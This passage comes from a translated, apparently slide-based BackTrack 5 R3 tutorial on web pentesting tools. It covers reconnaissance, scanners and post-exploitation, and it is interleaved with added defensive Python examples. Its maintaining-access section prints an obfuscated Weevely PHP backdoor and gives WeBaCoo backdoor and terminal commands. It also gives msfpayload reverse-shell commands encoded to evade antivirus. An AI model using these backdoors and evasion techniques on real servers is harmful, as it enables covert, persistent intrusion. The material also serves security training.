    /pentest/enumeration/web/cms-explorer# ./cms-explorer.pl -url http://sitio-web.com/ -type cms
• 9. WHATWEB: Another tool used to identify content management systems (CMS), blogging platforms, statistics packages, JavaScript libraries and the servers in use. It has 900 plugins for web analysis purposes.

Use:
    /pentest/enumeration/web/whatweb# ./whatweb http://sitio-web.com/
    /pentest/enumeration/web/whatweb# ./whatweb -v http://sitio-web.com/
    /pentest/enumeration/web/whatweb# ./whatweb -a 3 http://sitio-web.com/
    /pentest/enumeration/web/whatweb# ./whatweb 192.168.1.1/24

4. IDS/IPS DETECTION

While performing a VA/PT on a domain, there is the possibility that IDS/IPS services are installed; these can sometimes stop several types of attacks made against the domain. Many WAFs (Web Application Firewalls) are sold to companies as a successful technique for mitigating vulnerabilities in web applications. Fortunately, a WAF is easy to detect, because most of them use signature-based detection methods; therefore the attacker can try to encode parameters and attempt to bypass the WAF. The BackTrack suite includes a useful tool for detecting IDS/IPS, which is Waffit.

• WAFFIT: A tool that detects the firewall a web server may have in front of it. It is very useful, since detecting the firewall behind a domain is a very important step in the penetration testing process.

Use:
    /pentest/web/waffit# ./wafw00f.py http://sitio-web.com/
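As an added example (not part of the original slides or any of the tools named above), the following Python fingerprinter shows the kind of passive checks WhatWeb and BlindElephant make, working only on what a server volunteers in headers and HTML, so a defender can measure how much their own site discloses. The sample headers and HTML, and the CMS_PATH_HINTS heuristics, are constructed for the example.

```python
"""Passive CMS / version-disclosure fingerprinter (added example, not page code)."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed sample response: headers and HTML as a Joomla-style site might serve them.
SAMPLE_HEADERS = {
    "Server": "Apache/2.2.22 (Ubuntu)",
    "X-Powered-By": "PHP/5.3.10",
    "Set-Cookie": "PHPSESSID=abc123; path=/",
}
SAMPLE_HTML = """<html><head>
<meta name="generator" content="Joomla! 1.5 - Open Source Content Management" />
<script src="/media/system/js/mootools.js"></script>
</head><body></body></html>"""

# Static-asset path fragments typical of each CMS (constructed heuristics).
CMS_PATH_HINTS = {
    "WordPress": ["/wp-content/", "/wp-includes/"],
    "Joomla": ["/media/system/js/", "/templates/"],
    "Drupal": ["/sites/default/files/", "/misc/drupal.js"],
}


@dataclass
class Fingerprint:
    cms: Optional[str] = None
    cms_version: Optional[str] = None
    disclosures: List[str] = field(default_factory=list)  # banners the server need not send


def fingerprint(headers: Dict[str, str], html: str) -> Fingerprint:
    fp = Fingerprint()
    # 1. The generator meta tag is the loudest signal: product and version in clear text.
    m = re.search(r'<meta\s+name="generator"\s+content="([^"]+)"', html, re.I)
    if m:
        content = m.group(1)
        for name in CMS_PATH_HINTS:
            if name.lower() in content.lower():
                fp.cms = name
        v = re.search(r"(\d+(?:\.\d+)+)", content)
        if v:
            fp.cms_version = v.group(1)
        fp.disclosures.append(f"generator meta tag: {content}")
    # 2. Fall back on static asset paths when the meta tag has been removed.
    if fp.cms is None:
        for name, paths in CMS_PATH_HINTS.items():
            if any(p in html for p in paths):
                fp.cms = name
                break
    # 3. Version strings in Server / X-Powered-By headers.
    for h in ("Server", "X-Powered-By"):
        val = headers.get(h)
        if val and re.search(r"\d+\.\d+", val):
            fp.disclosures.append(f"{h} header: {val}")
    # 4. Default session cookie names reveal the platform (PHPSESSID, JSESSIONID, ...).
    if headers.get("Set-Cookie", "").startswith("PHPSESSID"):
        fp.disclosures.append("PHPSESSID cookie: PHP backend")
    return fp


if __name__ == "__main__":
    print(fingerprint(SAMPLE_HEADERS, SAMPLE_HTML))
```

A site that strips the generator tag, sets `ServerTokens Prod` and `expose_php = Off`, and renames its session cookie yields an empty disclosure list from the same function.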
• 11. 5. OPEN SOURCE ANALYSIS

Open Source Analysis is performed using tools like GHDB, revhosts and XSSed. GHDB (Google Hacking Database) and XSSed are websites, while revhosts is a console tool.

• GHDB: Google Hacking Database, a database of Google dorks maintained by the exploit-db team, which can greatly help a pen-tester in information gathering. We can use the dorks to find certain types of vulnerable servers or other information. For example, a Google dork like "Microsoft-IIS/6.0" intitle:index.of can be used to detect servers running Microsoft IIS 6.0.

• XSSED: http://www.xssed.com/ is a website that contains a list of websites vulnerable to Cross Site Scripting (XSS), reported by various authors. It can be opened from: Applications - Backtrack - Information Gathering - Web Application Analysis - Open Source Analysis - Xssed.

6. WEB CRAWLERS

In this last category of web analysis, well-known crawlers are used; these help a lot in listing the "hidden" files and folders inside a web server. The BackTrack suite has many tools to perform this type of analysis, such as DIRB, Golismero, SQLScan, Deblaze and WebShag.

• WEBSHAG: Webshag is a tool programmed in Python that combines features useful for auditing web servers, such as web crawling, URL scanning and file fuzzing. Webshag can be used to analyse a web server over HTTP or HTTPS, through a proxy, and using HTTP authentication (Basic and Digest).
• 12. Besides that, it proposes innovative IDS evasion features, intended to make correlation of the requests by the target application more complicated (for example, using a random proxy server for each HTTP request). It can be opened from Applications - BackTrack - Information Gathering - Web Application Analysis - Web Crawlers - WebShag Gui.

• DIRBUSTER: DirBuster is a Java application designed to brute force the directories and files of a web server / application. It is often the case that what looks like a web server in a default installation state is actually not, and has pages and applications hidden inside it; DirBuster tries to find these. DirBuster comes with a total of 9 different word lists, which makes it extremely effective at finding hidden files and directories. And if that were not enough, DirBuster also has the option of performing a pure brute force. It can be found at the following location: Applications - BackTrack - Vulnerability Assessment - Web Application Assessment - Web Application Fuzzers - DirBuster
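From the server's side, the crawling and brute forcing described in this section leaves a distinctive trace: one client producing a burst of 404 responses across many different paths. The following added example (not part of the original slides, and not DirBuster's or WebShag's code) flags that pattern in Apache/Nginx combined-format access logs; the log lines, client addresses, user agent and thresholds are constructed for the example.

```python
"""Detect directory brute forcing in combined-format access logs (added example)."""
import re
from collections import defaultdict
from datetime import datetime

# Combined log format: ip - - [time] "METHOD path HTTP/x" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Constructed sample: 10.0.0.9 is an ordinary visitor with one missing favicon;
# 10.0.0.5 walks a word list against the server within a few seconds.
SAMPLE_LOG = """\
10.0.0.9 - - [10/Oct/2012:13:55:36 +0000] "GET /index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Oct/2012:13:55:37 +0000] "GET /favicon.ico HTTP/1.1" 404 210 "-" "Mozilla/5.0"
10.0.0.5 - - [10/Oct/2012:13:55:40 +0000] "GET /admin/ HTTP/1.1" 404 210 "-" "DirBuster-1.0-RC1"
10.0.0.5 - - [10/Oct/2012:13:55:40 +0000] "GET /backup/ HTTP/1.1" 404 210 "-" "DirBuster-1.0-RC1"
10.0.0.5 - - [10/Oct/2012:13:55:41 +0000] "GET /old/ HTTP/1.1" 404 210 "-" "DirBuster-1.0-RC1"
10.0.0.5 - - [10/Oct/2012:13:55:41 +0000] "GET /test/ HTTP/1.1" 404 210 "-" "DirBuster-1.0-RC1"
10.0.0.5 - - [10/Oct/2012:13:55:42 +0000] "GET /phpmyadmin/ HTTP/1.1" 404 210 "-" "DirBuster-1.0-RC1"
10.0.0.5 - - [10/Oct/2012:13:55:43 +0000] "GET /config.php HTTP/1.1" 404 210 "-" "DirBuster-1.0-RC1"
10.0.0.5 - - [10/Oct/2012:13:55:44 +0000] "GET /images/ HTTP/1.1" 200 1450 "-" "DirBuster-1.0-RC1"
"""


def parse_log(text):
    """Parse combined-format lines into dicts; lines in another format are skipped."""
    events = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        e = m.groupdict()
        e["ts"] = datetime.strptime(e["ts"], TS_FMT)
        e["status"] = int(e["status"])
        events.append(e)
    return events


def find_dir_bruteforce(text, window_seconds=60, min_distinct_404=5):
    """Return {ip: details} for clients whose 404s cover at least `min_distinct_404`
    distinct paths inside some `window_seconds` window (sliding window per client)."""
    per_ip = defaultdict(list)
    for e in parse_log(text):
        if e["status"] == 404:
            per_ip[e["ip"]].append(e)
    flagged = {}
    for ip, evs in per_ip.items():
        evs.sort(key=lambda e: e["ts"])
        start = 0
        for end in range(len(evs)):
            # Advance the window start until the window fits inside window_seconds.
            while (evs[end]["ts"] - evs[start]["ts"]).total_seconds() > window_seconds:
                start += 1
            if len({e["path"] for e in evs[start:end + 1]}) >= min_distinct_404:
                flagged[ip] = {
                    "total_404": len(evs),
                    "distinct_404_paths": len({e["path"] for e in evs}),
                    "user_agents": sorted({e["ua"] for e in evs}),
                    "window_start": evs[start]["ts"].isoformat(),
                }
                break
    return flagged


if __name__ == "__main__":
    for ip, info in find_dir_bruteforce(SAMPLE_LOG).items():
        print(ip, info)
```

Tune the thresholds against your own traffic; a 404 burst from a single client, regardless of user agent, is the signal, since the agent string is trivially changed.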
• 14. 7. VULNERABILITY ASSESSMENT AND EXPLOITATION

The vulnerability assessment stage is where we can probe our target for flaws, but before a vulnerability assessment, gathering information about the target is much more useful. The information gathering phase remains the key step before any further attack, simply because it makes the job easier: for example, in the first stage, using CMS identification scanners such as BlindElephant, the target was scanned and the version of the installed application was found. Now, at the vulnerability assessment stage, we can use many tools (scanners) that help a lot in finding vulnerabilities in the specific web server.

• JOOMSCAN: A Perl-based tool used to identify known vulnerabilities such as SQL Injection, XSS and others on web servers based on the Joomla platform.
  • Detects the version of Joomla! that is running.
  • Scans for and locates known vulnerabilities in Joomla! and its extensions.
  • Reports in text or HTML format.
  • Allows immediate updating of the scanner via svn.
  • Detects vulnerability types: SQL injection, LFI, RFI, XSS and others.

It can be opened from
    /pentest/web/joomscan# ./joomscan.pl -u www.sitio-web.com

• SQLMAP: A tool that helps automate the process of detecting and exploiting SQL injection vulnerabilities, allowing full access to the database of the web server.

It can be opened from
    /pentest/database/sqlmap# ./sqlmap.py -u http://www.sitio-web.com/ --dbs
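The flaw sqlmap automates is shown below as an added example (not from the original slides or from sqlmap): a query built by string concatenation from a numeric `id` parameter, beside the parameterised version that closes it, run against a constructed in-memory SQLite table. Table and row contents are invented for the example.

```python
"""String-built query versus bound parameters (added example, not page code)."""
import sqlite3


def make_db():
    """Constructed sample table: two published rows and one unpublished draft."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, published INTEGER)")
    conn.executemany(
        "INSERT INTO news VALUES (?, ?, ?)",
        [(1, "Public post", 1), (2, "Draft post", 0), (3, "Another public post", 1)],
    )
    return conn


def get_news_vulnerable(conn, news_id):
    """The request parameter is pasted into the SQL text, so it can rewrite the WHERE
    clause: the published = 1 restriction is what a boolean-based scanner toggles."""
    sql = f"SELECT id, title FROM news WHERE published = 1 AND id = {news_id}"
    return conn.execute(sql).fetchall()


def get_news_safe(conn, news_id):
    """Validate the type first, then bind the value; the SQL text never changes."""
    try:
        news_id = int(news_id)
    except (TypeError, ValueError):
        return []  # a non-numeric id is rejected before reaching the database
    return conn.execute(
        "SELECT id, title FROM news WHERE published = 1 AND id = ?", (news_id,)
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    crafted = "1 OR 1=1"  # constructed input that appends a tautology
    print("vulnerable:", get_news_vulnerable(db, crafted))  # every row, draft included
    print("safe:      ", get_news_safe(db, crafted))         # nothing
```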
• 15. FIMAP: A small tool programmed in Python which can find, prepare, audit and automatically exploit Remote File Inclusion errors in web applications. It is currently under development, but it is usable. The objective of Fimap is to improve the quality and security of your website.

It can be opened from
    /pentest/web/fimap# ./fimap.py -u http://localhost/test.php?file=bang&id=23
    /pentest/web/fimap# ./fimap.py -g -q 'noticias.php?id='
• 16. SHODAN: Another assessment site, particularly useful for pentesters. It can be used to collect a range of intelligence about devices that are connected to the Internet. We can, for example, check whether network devices such as routers, VoIP equipment, printers, cameras, etc. are exposed. To find out whether a service is running on the domain, the syntax would be:
  • hostname:target.com port:80,21,22
If we simply want results on the host name, the syntax would be:
  • hostname:target.com

• W3AF: W3af (Web Application Attack and Audit Framework) is a web application security tool, basically divided into several plugin types such as Attack, Audit, Exploit, Discovery, Brute Force and Evasion, each of which can be used as required. These types group several side modules in w3af; for example, we can select the XSS module under Audit when that particular check is needed. It can be opened from Applications - BackTrack - Vulnerability Assessment - Web Application Assessment - Web Vulnerability Scanners - w3af
• 17. Once the analysis is complete, w3af shows detailed information about the vulnerabilities found in the specified website, which can then be used for further exploitation.
• 18. UNISCAN: A web vulnerability scanner, oriented to computer security, aimed at finding vulnerabilities in web systems. It is licensed under the GNU General Public License 3.0 (GPL 3). Uniscan is developed in Perl, has easy handling of regular expressions and is also multi-threaded. Features:
  • Identification of system pages via a web crawler.
  • Testing of pages found via the GET method.
  • Testing of forms found via the POST method.
  • Support for SSL requests (HTTPS).
  • Proxy support.
  • Generates a list of sites via Google.
  • Generates a list of sites via Bing.
  • Client GUI written using Perl Tk.

It can be downloaded from the following link: http://uniscan.sourceforge.net/?page_id=7 and it can be opened from
    ./uniscan.pl -u http://www.sitio-web.com/ -qweds

• NIKTO: A web server scanner which performs comprehensive tests against web servers for multiple items, including over 6500 potentially dangerous files/CGIs, checks for outdated versions of over 1250 servers, and version-specific problems on over 270 servers. It also checks server configuration items, such as the presence of multiple index files and HTTP server options. Nikto is a robust project that has been several years in development and is constantly evolving. Some of the most interesting features of this tool include the ability to generate reports in various formats, integration with LibWhisker (Anti-IDS) and integration with Metasploit, among others. It can be opened from Applications - BackTrack - Vulnerability Assessment - Web Application Assessment - Web Vulnerability Scanners - Nikto

Use:
    /pentest/web/nikto# ./nikto.pl -host www.sitio-web.com

8. MAINTAINING ACCESS

Once we have access to the website (target), we need to maintain that access for future use, so that we do not have to start from scratch again and again. To do this, we can upload web shells or backdoors to the web page. The encoding of the backdoor is also important, so that it does not create "noise" when loaded on the server; otherwise administrators can easily detect and remove the backdoors. The BackTrack 5 R3 suite incorporates good tools to carry out this process, which are:

• WEEVELY: An essential tool for the post-exploitation of web applications, which can be used as a backdoor or as a web shell to manage web accounts. Weevely looks for functions like system(), passthru(), popen(), exec(), proc_open(), shell_exec(), pcntl_exec(), perl->system() and python_eval() that are enabled on the remote server. The following code is an example of the backdoor code generated by Weevely.
-------------------------------------------------------------------------------------------------------------------
eval(base64_decode('cGFyc2Vfc3RyKCRfU0VSVkVSWydIVFRQX1JFRkVSRVInXSwk YSk7IGlmKHJlc2V0KCRhKT09J2luJyAmJiBjb3VudCgkYSk9PTkpIHsgZWNobyAnPGZv c2VjPic7ZXZhbChiYXNlNjRfZGVjb2RlKHN0cl9yZXBsYWNlKCIgIiwgIisiLCBqb2luK GFycmF5X3NsaWNlKCRhLGNvdW50KCRhKS0zKSkpKSk7ZWNobyAnPC9mb3NlYz4nO30='));
-------------------------------------------------------------------------------------------------------------------
It can be opened from Applications - BackTrack - Maintaining Access - Web BackDoors - Weevely

Use:
    /pentest/backdoors/web/weevely# ./weevely.py generate password /root/back.php
    /pentest/backdoors/web/weevely# ./weevely.py http://www.sitio-web.com/back.php password

• WEBACOO: WeBaCoo (Web Backdoor Cookie) is a backdoor that provides a terminal connection over HTTP between client and web server. It is a post-exploitation tool to maintain access to a (compromised) web server. It was designed to operate under the radar of modern up-to-date AV, NIDS, IPS, network firewalls and application firewalls, providing a stealth mechanism to execute commands on the compromised server. The obfuscated file communicates via the HTTP Cookie header, validating HTTP requests and responses from the web server. WeBaCoo provides a way to generate the code of the PHP backdoor using predefined payloads. It also offers a "terminal" mode in which the user can establish a remote connection to the server and execute commands with the privileges of the web service. The download is available from Github: https://github.com/anestisb/WeBaCoo

Options:
  1) Create obfuscated backdoor 'backdoor.php' with default settings:
     ./webacoo.pl -g -o backdoor.php
  2) Create de-obfuscated backdoor 'raw-backdoor.php' using the "transit" function:
     ./webacoo.pl -g -o raw-backdoor.php -f 4 -r
  3) Establish a "terminal" connection to the remote host using the default settings:
     ./webacoo.pl -t -u http://127.0.0.1/backdoor.php
  4) Establish a "terminal" connection to the remote host, configuring some arguments:
     ./webacoo.pl -t -u http://127.0.0.1/backdoor.php -c "Test-Cookie" -d "TTT"

• 21. 5) Establish a "terminal" connection to the remote host via an HTTP proxy:
     ./webacoo.pl -t -u http://10.0.1.13/backdoor.php -p 127.0.0.1:8080
  6) Establish a "terminal" connection to the remote host via an HTTP proxy with basic authentication:
     ./webacoo.pl -t -u http://10.0.1.13/backdoor.php -p user:password:10.0.1.8:3128
  7) Establish a "terminal" connection to the remote host via Tor and log the activity:
     ./webacoo.pl -t -u http://example.com/backdoor.php -p tor -l webacoo_log.txt

• MSFPAYLOAD: Metasploit can be used to create backdoors that can then be used to maintain access to the web server. This can be done with the help of msfpayload. The steps to create a backdoor with msfpayload are as follows. We have to select the payload that we will use to get a Meterpreter shell through a reverse TCP connection. The command would be:
    msfpayload windows/meterpreter/reverse_tcp
This payload has two parameters: LHOST (our IP) and LPORT to select the port that we will use. The "R" outputs the payload in raw format so that we can then encode it:
    msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1234 R
This command creates the payload, but it has to be encoded to avoid antivirus detection; this can be done with msfencode, piping ("|") the output into it:
    msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1337 R | msfencode -e x86/shikata_ga_nai -t exe >> bucker.exe
-e is used to specify the encoder (in this case I'm using the shikata_ga_nai encoder) and -t the type of file (exe). If we want to see the list of available MSF encoders, we use the following command:
    msfpayload windows/meterpreter/reverse_tcp -l
• 22. 9. CONCLUSION

These are only a few of the methods you can follow to exploit vulnerabilities in a web application. Once we have the information about our target, we try to perform a vulnerability assessment in order to obtain information about the exploits that can be used. Once that is done, we exploit the vulnerabilities and, if necessary, upload a backdoor, but before that the backdoor must be encoded to avoid detection. I hope this helps you with finding vulnerabilities, exploitation and maintaining access to your target. My greetings.

References:
http://en.wikipedia.org/wiki/Penetration_test
http://www.giac.org/certification/web-application-penetration-tester-gwapt
http://www.offensive-security.com/information-security-training/penetration-testing-with-backtrack/
https://www.owasp.org/index.php/Web_Application_Penetration_Testing